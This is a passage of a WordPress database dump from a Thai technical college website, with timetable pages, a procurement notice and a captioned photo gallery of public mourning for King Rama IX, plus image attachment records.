'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
(4414, 4, '2018-11-12 17:19:05', '2018-11-12 10:19:05', '<h3><span style=\"color: #993366;\">ตารางสอนครู</span></h3>\r\n<a href=\"https://drive.google.com/open?id=1wFlgoyeoS1Pg-zSFQB0W7cjDuALXZwMR\">ปีการศึกษา 1/2560 </a>\r\n\r\n<a href=\"https://drive.google.com/drive/folders/1s5ZqbV0gwdItaOdkYYP3lDPxM3v28r9D?usp=sharing\">ปีการศึกษา 2/2560 </a>\r\n\r\n<a href=\"https://drive.google.com/drive/folders/1edMX3D9uKF7qxQXyo1e8KOtKSceRl8DJ?usp=sharing\">ปีการศึกษา 1/2561</a>\r\n\r\nปีการศึกษา 2/2561\r\n\r\n \r\n<h3><span style=\"color: #993366;\">ตารางเรียนนักเรียน-นักศึกษา</span></h3>\r\nปีการศึกษา 1/2560\r\n\r\nปีการศึกษา 2/2560\r\n\r\nปีการศึกษา 1/2561\r\n\r\nปีการศึกษา 2/2561', 'ตารางเรียน-ตารางสอน', '', 'inherit', 'closed', 'closed', '', '1174-revision-v1', '', '', '2018-11-12 17:19:05', '2018-11-12 10:19:05', '', 1174, 'http://www.technicrayong.ac.th/1174-revision-v1/', 0, 'revision', '', 0),
(4415, 3, '2018-11-12 21:42:15', '2018-11-12 14:42:15', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F44822_201811121603.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ขอเชิญชวนร่วมจัดทำคุณลักษณะเฉพาะครุภัณฑ์การศึกษาสาขาวิชาช่างเชื่อมโลหะ ประจำปีงบประมาณ ๒๕๖๒', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%82%e0%b8%ad%e0%b9%80%e0%b8%8a%e0%b8%b4%e0%b8%8d%e0%b8%8a%e0%b8%a7%e0%b8%99%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%88%e0%b8%b1-2', '', '', '2018-11-12 21:46:48', '2018-11-12 14:46:48', '', 0, 'http://www.technicrayong.ac.th/?p=4415', 248, 'post', '', 0),
(4416, 3, '2018-11-12 21:41:47', '2018-11-12 14:41:47', '', '44822_201811121603', '', 'inherit', 'closed', 'closed', '', '44822_201811121603', '', '', '2018-11-12 21:41:47', '2018-11-12 14:41:47', '', 4415, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/44822_201811121603.pdf', 0, 'attachment', 'application/pdf', 0),
(4417, 3, '2018-11-12 21:42:15', '2018-11-12 14:42:15', '', 'ประกาศ ขอเชิญชวนร่วมจัดทำคุณลักษณะเฉพาะครุภัณฑ์การศึกษาสาขาวิชาช่างเชื่อมโลหะ ประจำปีงบประมาณ ๒๕๖๒', '', 'inherit', 'closed', 'closed', '', '4415-revision-v1', '', '', '2018-11-12 21:42:15', '2018-11-12 14:42:15', '', 4415, 'http://www.technicrayong.ac.th/4415-revision-v1/', 0, 'revision', '', 0),
(4418, 3, '2018-11-12 21:46:48', '2018-11-12 14:46:48', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F44822_201811121603.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ขอเชิญชวนร่วมจัดทำคุณลักษณะเฉพาะครุภัณฑ์การศึกษาสาขาวิชาช่างเชื่อมโลหะ ประจำปีงบประมาณ ๒๕๖๒', '', 'inherit', 'closed', 'closed', '', '4415-revision-v1', '', '', '2018-11-12 21:46:48', '2018-11-12 14:46:48', '', 4415, 'http://www.technicrayong.ac.th/4415-revision-v1/', 0, 'revision', '', 0),
(4425, 3, '2018-11-13 09:26:59', '2018-11-13 02:26:59', '', '2222', '', 'inherit', 'closed', 'closed', '', '2222', '', '', '2018-11-13 09:26:59', '2018-11-13 02:26:59', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/2222.png', 0, 'attachment', 'image/png', 0),
(4426, 3, '2018-11-13 13:08:49', '2018-11-13 06:08:49', '<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"><strong>“ธ สถิตในดวงใจไทยนิรันดร์”</strong></span></h3>\r\n<p style=\"text-align: center;\"><img class=\"aligncenter size-large wp-image-4437\" src=\"/wp-content/uploads/2018/11/1-Bundit-Chotsuwan-copy-1024x643.jpg\" alt=\"\" width=\"640\" height=\"402\" />พสกนิกรมารอรับขบวนอัญเชิญพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชจากโรงพยาบาลศิริราชไปยังพระบรมมหาราชวังท่ามกลางความโศกเศร้าเงียบงันตลอดระยะทาง</p>\r\n<img class=\"aligncenter size-large wp-image-4438\" src=\"/wp-content/uploads/2018/11/6-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">แพทย์ พยาบาล และอาสาสมัครต้องรับมือกับอาการหน้ามืดเป็นลม เนื่องจากอากาศที่ร้อนอบอ้าวและประชาชนจํานวนมาก</p>\r\n<img class=\"aligncenter size-large wp-image-4439\" src=\"/wp-content/uploads/2018/11/7-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">หนึ่งในกลุ่มชาติพันธุ์ที่มาแสดงความอาลัยและประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามประเพณีของแต่ละกลุ่ม คือ “ชาวอาข่า” ในภาพหญิงชาวอาข่า 5 คน กําลังประกอบพิธีกรรมและท่อง “บทสวด” ที่ใช้ในพิธีศพตามวัฒนธรรมอาข่า</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ผู้ปิดทองหลังพระ”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4440\" src=\"/wp-content/uploads/2018/11/9-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">บุคลากรในหน่วยปฐมพยาบาลในสถานที่ต่างๆ ที่มีการรวมตัวกันของพสกนิกรชาวไทย เพื่อทํากิจกรรมถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 นั้น คือ “ผู้ปิดทองหลังพระ”อย่างแท้จริง เพราะด้วยสภาพอากาศที่อบอ้าวและความเนืองแน่นของประชาชนที่มารวมตัวกันส่งผลให้ผู้คนเจ็บป่วยเป็นจํานวนมาก ในภาพนี้พยาบาลและอาสาสมัคร กําลังให้การช่วยเหลือแก่หญิง 2 คนที่เป็นลมขณะรอคิวเข้ากราบสักการะพระบรมศพ ณ บริเวณเต็นท์ปฐมพยาบาลด้านข้างสนามหลวงภายใต้แดดที่ร้อนจัดและอากาศที่อบอ้าว</p>\r\n<img class=\"aligncenter size-large wp-image-4441\" src=\"/wp-content/uploads/2018/11/26-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ประชาชนจากทั่วสารทิศมารวมตัวกันแต่เช้าตรู่ เพื่อเตรียมร้องเพลงสรรเสริญพระบารมีครั้งประวัติศาสตร์ร่วมกันเสียงเพลงในคํ่าคืนนั้นดังกึกก้องไปทั่วท้องสนามหลวงและตราตรึงในหัวใจชาวไทยตลอดไป</p>\r\n<img class=\"aligncenter size-large wp-image-4442\" src=\"/wp-content/uploads/2018/11/28-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">เหล่าพยาบาลรวมตัวกันถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ณ กระทรวงสาธารณสุข</p>\r\n<img class=\"aligncenter size-large wp-image-4443\" src=\"/wp-content/uploads/2018/11/29-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">พยาบาลท่านหนึ่งกําลังปฏิบัติหน้าที่ดูแลและให้ความช่วยเหลือผู้คนอย่างใกล้ชิดท่ามกลางศิษย์เก่าและศิษย์ปัจจุบันของมหาวิทยาลัยธรรมศาสตร์ที่มารวมตัวแสดงความอาลัยต่อในหลวงรัชกาลที่ 9 ด้วยการแปรอักษร ณ สนามฟุตบอลมหาวิทยาลัยธรรมศาสตร์ วิทยาเขตท่าพระจันทร์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในหลวงของแผ่นดิน”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4444\" src=\"/wp-content/uploads/2018/11/30-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">เด็กน้อยชูพระบรมฉายาลักษณ์ของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ในขณะรอรับขบวนอัญเชิญพระบรมศพ ที่เคลื่อนจากโรงพยาบาลศิริราชไปยังพระบรมมหาราชวัง สู่พระที่นั่งดุสิตมหาปราสาท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"รวมใจถวายความอาลัย\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4445\" src=\"/wp-content/uploads/2018/11/34-Bundit-Chotsuwan-copy-1024x668.jpg\" alt=\"\" width=\"640\" height=\"418\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แสงเทียนแห่งสยาม”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4446\" src=\"/wp-content/uploads/2018/11/41-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แด่พระองค์”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4447\" src=\"/wp-content/uploads/2018/11/44-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">วีรชัย บาลไธสง ศิลปินอิสระ ตั้งใจว่าจะวาดว่าพระบรมสาทิสลักษณ์มาถวายให้ในหลวงรัชกาลที่ 9 ในวันที่ 5 ธันวาคม พ.ศ. 2559 แต่ยังไม่ทันถึงวันนั้น ข่าวการเสด็จสวรรคตของในหลวง ในวันที่ 13 ตุลาคม พ.ศ. 2559 ทําให้เขามายืนเฝ้ารับขบวนอัญเชิญพระบรมศพที่หน้าโรงพยาบาลศิริราช พร้อมกับชู “ภาพที่วาดไม่เสร็จ” นั้นด้วยความอาลัยยิ่ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"พยาบาลของพ่อ ณ ศิริราช\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4448\" src=\"/wp-content/uploads/2018/11/45-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">ภาพประทับใจจากงานนิทรรศการ “น้อมรําลึกในหลวงรัชกาลที่ ๙”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4449\" src=\"/wp-content/uploads/2018/11/50-Bundit-Chotsuwan-copy-1024x646.jpg\" alt=\"\" width=\"640\" height=\"404\" />\r\n<p style=\"text-align: center;\">ณ หอศิลปวัฒนธรรมแห่งกรุงเทพมหานคร โดยสมาคมถ่ายภาพแห่งประเทศไทยในพระบรมราชูปถัมภ์ ภายในงานจัดแสดงภาพถ่าย 89 ภาพ จากช่างภาพ 89 คน ที่พร้อมใจถ่ายทอดความรู้สึกและความทรงจําที่มีต่อในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“รวมใจเป็นหนึ่งเดียว”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4450\" src=\"/wp-content/uploads/2018/11/53-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">แม้แดดยามบ่ายจะร้อน แต่ผู้คนก็ยิ่งหลั่งไหลเข้ามาในบริเวณรอบกําแพงพระบรมมหาราชวัง และในท้องสนามหลวง เพื่อร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนแสดงความอาลัย</p>\r\n<img class=\"aligncenter size-large wp-image-4451\" src=\"/wp-content/uploads/2018/11/56-Bundit-Chotsuwan-copy-1024x684.jpg\" alt=\"\" width=\"640\" height=\"428\" />\r\n<p style=\"text-align: center;\">ในคํ่าคืนที่เงียบงันและแสนเศร้าของชาวไทย พสกนิกรต่างนําดอกไม้มากราบแสดงความอาลัยต่อการจากไปของในหลวงผู้เป็นที่รักยิ่ง\r\nตลอดแนวกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แสงเทียนแห่งสยาม”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4452\" src=\"/wp-content/uploads/2018/11/60-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ณ เวลา 0 .09 น. ของคืนส่งท้ายปี เก่าต้อนรับปี ใหม่ วันที่ 1 มกราคม พ.ศ. 25 60 บริเวณท้องสนามหลวงสว่างไสวไปด้วยแสงเทียน และกึกก้องไปด้วยเสียงสวดมนต์และเสียงเพลงสรรเสริญพระบารมีของประชาชนที่มาร่วมงาน “แสงเทียนแห่งสยาม” ซึ่งรัฐบาลจัดขึ้นเพื่อถวายเป็นพระราชกุศล แด่ในหลวงรัชกาลที่ 9 และพระบรมวงศานุวงศ์ทุกพระองค์ รวมทั้งเพื่อเสริมความเป็นสิริมงคลแก่ประชาชนชาวไทย ให้มีความสุขตลอดปี</p>\r\n<img class=\"aligncenter size-large wp-image-4453\" src=\"/wp-content/uploads/2018/11/63-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ประชาชนจากทั่วสารทิศมารวมตัวกันแต่เช้าตรู่ เพื่อเตรียมร้องเพลงสรรเสริญพระบารมีครั้งประวัติศาสตร์ร่วมกัน เสียงเพลงในคํ่าคืนนั้นดังกึกก้องไปทั่วท้องสนามหลวงและตราตรึงในหัวใจชาวไทยตลอดไป</p>\r\n<img class=\"aligncenter size-large wp-image-4454\" src=\"/wp-content/uploads/2018/11/66-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter size-large wp-image-4455\" src=\"/wp-content/uploads/2018/11/67-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">พยาบาล แพทย์ และประชาชนที่มาร่วมงาน “จุฬาฯ เทิด ธ พระภูมิพล”ณ บริเวณลานพระบรมราชานุสาวรีย์ รัชกาลที่ 6 กําลังยืนสงบนิ่งต่อหน้าพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 เพื่อแสดงความอาลัย และรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<img class=\"aligncenter size-large wp-image-4456\" src=\"/wp-content/uploads/2018/11/68-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">บรรยากาศโดยรอบกําแพงพระบรมมหาราชวัง ประชาชนเดินทางมาแสดงอาลัยด้วยรําลึกในพระมหากรุณาธิคุณอย่างที่สุดมิได้ของพระบาทสมเด็จพระเจ้าอยู่หัวพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n<img class=\"aligncenter size-large wp-image-4457\" src=\"/wp-content/uploads/2018/11/71-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“จุฬาฯ เทิด ธ พระภูมิพล”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4458\" src=\"/wp-content/uploads/2018/11/75-Bundit-Chotsuwan-copy-1024x658.jpg\" alt=\"\" width=\"640\" height=\"411\" />\r\n<p style=\"text-align: center;\">แพทย์ พยาบาล และบุคลากรจากคณะแพทยศาสตร์ จุฬาลงกรณ์มหาวิทยาลัยและโรงพยาบาลจุฬาลงกรณ์ จุดเทียนถวายอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n<img class=\"aligncenter size-large wp-image-4459\" src=\"/wp-content/uploads/2018/11/87-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">หน่วยแพทย์และพยาบาลตั้งจุดให้บริการครอบคลุมทั้งพื้นที่ท้องสนามหลวงและโดยรอบพระบรมมหาราชวัง เพื่อคอยดูแลสุขภาพของประชาชนที่เดินทางมารอเข้าถวายสักการะพระบรมศพ พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ พระที่นั่งดุสิตมหาปราสาท</p>\r\n<img class=\"aligncenter size-large wp-image-4460\" src=\"/wp-content/uploads/2018/11/96-Bundit-Chotsuwan-copy-1024x697.jpg\" alt=\"\" width=\"640\" height=\"436\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบพ่อครั้งสุดท้าย”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4461\" src=\"/wp-content/uploads/2018/11/97-Bundit-Chotsuwan-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter size-large wp-image-4462\" src=\"/wp-content/uploads/2018/11/100-Bundit-Chotsuwan-copy-1024x712.jpg\" alt=\"\" width=\"640\" height=\"445\" />', 'ภาพถ่าย โดย บัณฑิต โชติสุวรรณ', '', 'publish', 'closed', 'closed', '', '%e0%b8%a0%e0%b8%b2%e0%b8%9e%e0%b8%96%e0%b9%88%e0%b8%b2%e0%b8%a2-%e0%b9%82%e0%b8%94%e0%b8%a2-%e0%b8%9a%e0%b8%b1%e0%b8%93%e0%b8%91%e0%b8%b4%e0%b8%95-%e0%b9%82%e0%b8%8a%e0%b8%95%e0%b8%b4%e0%b8%aa', '', '', '2018-11-13 14:09:26', '2018-11-13 07:09:26', '', 0, 'http://www.technicrayong.ac.th/?page_id=4426', 0, 'page', '', 0),
(4427, 3, '2018-11-13 09:30:16', '2018-11-13 02:30:16', '', '3333', '', 'inherit', 'closed', 'closed', '', '3333', '', '', '2018-11-13 09:30:16', '2018-11-13 02:30:16', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/3333.png', 0, 'attachment', 'image/png', 0),
(4431, 3, '2018-11-13 09:38:33', '2018-11-13 02:38:33', '', '55555', '', 'inherit', 'closed', 'closed', '', '55555', '', '', '2018-11-13 09:38:33', '2018-11-13 02:38:33', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/55555.png', 0, 'attachment', 'image/png', 0),
(4435, 3, '2018-11-13 09:41:56', '2018-11-13 02:41:56', 'https://youtu.be/xrNi-56jrzQ\r\n<h2><span style=\"color: #993300;\"><strong>เชิญชมภาพถ่าย คลิก Link ด้านล่าง</strong></span></h2>\r\n<h3><span style=\"color: #003300;\"><a style=\"color: #003300;\" href=\"/ภาพถ่าย-โดย-อรุณ-ร้อยศรี\">ภาพถ่าย โดย อรุณ ร้อยศรี</a></span></h3>\r\n<h3><span style=\"color: #003300;\">ภาพถ่าย โดย บัณฑิต โชติสุวรรณ</span></h3>\r\n<h3><span style=\"color: #003300;\">ภาพถ่าย โดย จันทร์กลาง กันทอง</span></h3>\r\n<h3><span style=\"color: #003300;\">ภาพถ่าย โดย เริงชัย คงเมือง</span></h3>\r\n<h3><span style=\"color: #003300;\">ภาพถ่าย โดย เริงฤทธิ์ คงเมือง</span></h3>', '๑๐๐ วัน ร้อยเรื่อง เปลี่ยนความโทมนัสเป็นพลัง', '', 'inherit', 'closed', 'closed', '', '3805-revision-v1', '', '', '2018-11-13 09:41:56', '2018-11-13 02:41:56', '', 3805, 'http://www.technicrayong.ac.th/3805-revision-v1/', 0, 'revision', '', 0),
(4436, 3, '2018-11-13 13:08:49', '2018-11-13 06:08:49', '<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"><strong>“ธ สถิตในดวงใจไทยนิรันดร์”</strong></span></h3>\r\n ', 'ภาพถ่าย โดย บัณฑิต โชติสุวรรณ', '', 'inherit', 'closed', 'closed', '', '4426-revision-v1', '', '', '2018-11-13 13:08:49', '2018-11-13 06:08:49', '', 4426, 'http://www.technicrayong.ac.th/4426-revision-v1/', 0, 'revision', '', 0),
(4437, 3, '2018-11-13 13:10:20', '2018-11-13 06:10:20', '', '1-Bundit Chotsuwan copy', '', 'inherit', 'closed', 'closed', '', '1-bundit-chotsuwan-copy', '', '', '2018-11-13 13:10:20', '2018-11-13 06:10:20', '', 4426, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/1-Bundit-Chotsuwan-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4438, 3, '2018-11-13 13:10:33', '2018-11-13 06:10:33', '', '6-Bundit Chotsuwan copy', '', 'inherit', 'closed', 'closed', '', '6-bundit-chotsuwan-copy', '', '', '2018-11-13 13:10:33', '2018-11-13 06:10:33', '', 4426, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/6-Bundit-Chotsuwan-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4439, 3, '2018-11-13 13:10:47', '2018-11-13 06:10:47', '', '7-Bundit Chotsuwan copy', '', 'inherit', 'closed', 'closed', '', '7-bundit-chotsuwan-copy', '', '', '2018-11-13 13:10:47', '2018-11-13 06:10:47', '', 4426, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/7-Bundit-Chotsuwan-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4440, 3, '2018-11-13 13:10:57', '2018-11-13 06:10:57', '', '9-Bundit Chotsuwan copy', '', 'inherit', 'closed', 'closed', '', '9-bundit-chotsuwan-copy', '', '', '2018-11-13 13:10:57', '2018-11-13 06:10:57', '', 4426, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/9-Bundit-Chotsuwan-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4441, 3, '2018-11-13 13:11:07', '2018-11-13 06:11:07', '', '26-Bundit Chotsuwan copy', '', 'inherit', 'closed', 'closed', '', '26-bundit-chotsuwan-copy', '', '', '2018-11-13 13:11:07', '2018-11-13 06:11:07', '', 4426, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/26-Bundit-Chotsuwan-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4442, 3, '2018-11-13 13:11:17', '2018-11-13 06:11:17', '', '28-Bundit Chotsuwan copy', '', 'inherit', 'closed', 'closed', '', '28-bundit-chotsuwan-copy', '', '', '2018-11-13 13:11:17', '2018-11-13 06:11:17', '', 4426, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/28-Bundit-Chotsuwan-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4443, 3, '2018-11-13 13:11:31', '2018-11-13 06:11:31', '', '29-Bundit Chotsuwan copy', '', 'inherit', 'closed', 'closed', '', '29-bundit-chotsuwan-copy', '', '', '2018-11-13 13:11:31', '2018-11-13 06:11:31', '', 4426, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/29-Bundit-Chotsuwan-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4444, 3, '2018-11-13 13:11:42', '2018-11-13 06:11:42', '', '30-Bundit Chotsuwan copy', '', 'inherit', 'closed', 'closed', '', '30-bundit-chotsuwan-copy', '', '', '2018-11-13 13:11:42', '2018-11-13 06:11:42', '', 4426, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/30-Bundit-Chotsuwan-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4445, 3, '2018-11-13 13:11:54', '2018-11-13 06:11:54', '', '34-Bundit Chotsuwan copy', '', 'inherit', 'closed', 'closed', '', '34-bundit-chotsuwan-copy', '', '', '2018-11-13 13:11:54', '2018-11-13 06:11:54', '', 4426, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/34-Bundit-Chotsuwan-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4446, 3, '2018-11-13 13:12:05', '2018-11-13 06:12:05', '', '41-Bundit Chotsuwan copy', '', 'inherit', 'closed', 'closed', '', '41-bundit-chotsuwan-copy', '', '', '2018-11-13 13:12:05', '2018-11-13 06:12:05', '', 4426, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/41-Bundit-Chotsuwan-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4447, 3, '2018-11-13 13:12:18', '2018-11-13 06:12:18', '', '44-Bundit Chotsuwan copy', '', 'inherit', 'closed', 'closed', '', '44-bundit-chotsuwan-copy', '', '', '2018-11-13 13:12:18', '2018-11-13 06:12:18', '', 4426, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/44-Bundit-Chotsuwan-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4448, 3, '2018-11-13 13:12:30', '2018-11-13 06:12:30', '', '45-Bundit Chotsuwan copy', '', 'inherit', 'closed', 'closed', '', '45-bundit-chotsuwan-copy', '', '', '2018-11-13 13:12:30', '2018-11-13 06:12:30', '', 4426, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/45-Bundit-Chotsuwan-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4449, 3, '2018-11-13 13:12:46', '2018-11-13 06:12:46', '', '50-Bundit Chotsuwan copy', '', 'inherit', 'closed', 'closed', '', '50-bundit-chotsuwan-copy', '', '', '2018-11-13 13:12:46', '2018-11-13 06:12:46', '', 4426, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/50-Bundit-Chotsuwan-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4450, 3, '2018-11-13 13:12:59', '2018-11-13 06:12:59', '', '53-Bundit Chotsuwan copy', '', 'inherit', 'closed', 'closed', '', '53-bundit-chotsuwan-copy', '', '', '2018-11-13 13:12:59', '2018-11-13 06:12:59', '', 4426, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/53-Bundit-Chotsuwan-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4451, 3, '2018-11-13 13:13:10', '2018-11-13 06:13:10', '', '56-Bundit Chotsuwan copy', '', 'inherit', 'closed', 'closed', '', '56-bundit-chotsuwan-copy', '', '', '2018-11-13 13:13:10', '2018-11-13 06:13:10', '', 4426, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/56-Bundit-Chotsuwan-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4452, 3, '2018-11-13 13:13:20', '2018-11-13 06:13:20', '', '60-Bundit Chotsuwan copy', '', 'inherit', 'closed', 'closed', '', '60-bundit-chotsuwan-copy', '', '', '2018-11-13 13:13:20', '2018-11-13 06:13:20', '', 4426, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/60-Bundit-Chotsuwan-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4453, 3, '2018-11-13 13:13:30', '2018-11-13 06:13:30', '', '63-Bundit Chotsuwan copy', '', 'inherit', 'closed', 'closed', '', '63-bundit-chotsuwan-copy', '', '', '2018-11-13 13:13:30', '2018-11-13 06:13:30', '', 4426, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/63-Bundit-Chotsuwan-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4454, 3, '2018-11-13 13:13:42', '2018-11-13 06:13:42', '', '66-Bundit Chotsuwan copy', '', 'inherit', 'closed', 'closed', '', '66-bundit-chotsuwan-copy', '', '', '2018-11-13 13:13:42', '2018-11-13 06:13:42', '', 4426, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/66-Bundit-Chotsuwan-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4455, 3, '2018-11-13 13:13:55', '2018-11-13 06:13:55', '', '67-Bundit Chotsuwan copy', '', 'inherit', 'closed', 'closed', '', '67-bundit-chotsuwan-copy', '', '', '2018-11-13 13:13:55', '2018-11-13 06:13:55', '', 4426, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/67-Bundit-Chotsuwan-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4456, 3, '2018-11-13 13:14:05', '2018-11-13 06:14:05', '', '68-Bundit Chotsuwan copy', '', 'inherit', 'closed', 'closed', '', '68-bundit-chotsuwan-copy', '', '', '2018-11-13 13:14:05', '2018-11-13 06:14:05', '', 4426, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/68-Bundit-Chotsuwan-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4457, 3, '2018-11-13 13:14:17', '2018-11-13 06:14:17', '', '71-Bundit Chotsuwan copy', '', 'inherit', 'closed', 'closed', '', '71-bundit-chotsuwan-copy', '', '', '2018-11-13 13:14:17', '2018-11-13 06:14:17', '', 4426, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/71-Bundit-Chotsuwan-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4458, 3, '2018-11-13 13:14:30', '2018-11-13 06:14:30', '', '75-Bundit Chotsuwan copy', '', 'inherit', 'closed', 'closed', '', '75-bundit-chotsuwan-copy', '', '', '2018-11-13 13:14:30', '2018-11-13 06:14:30', '', 4426, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/75-Bundit-Chotsuwan-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
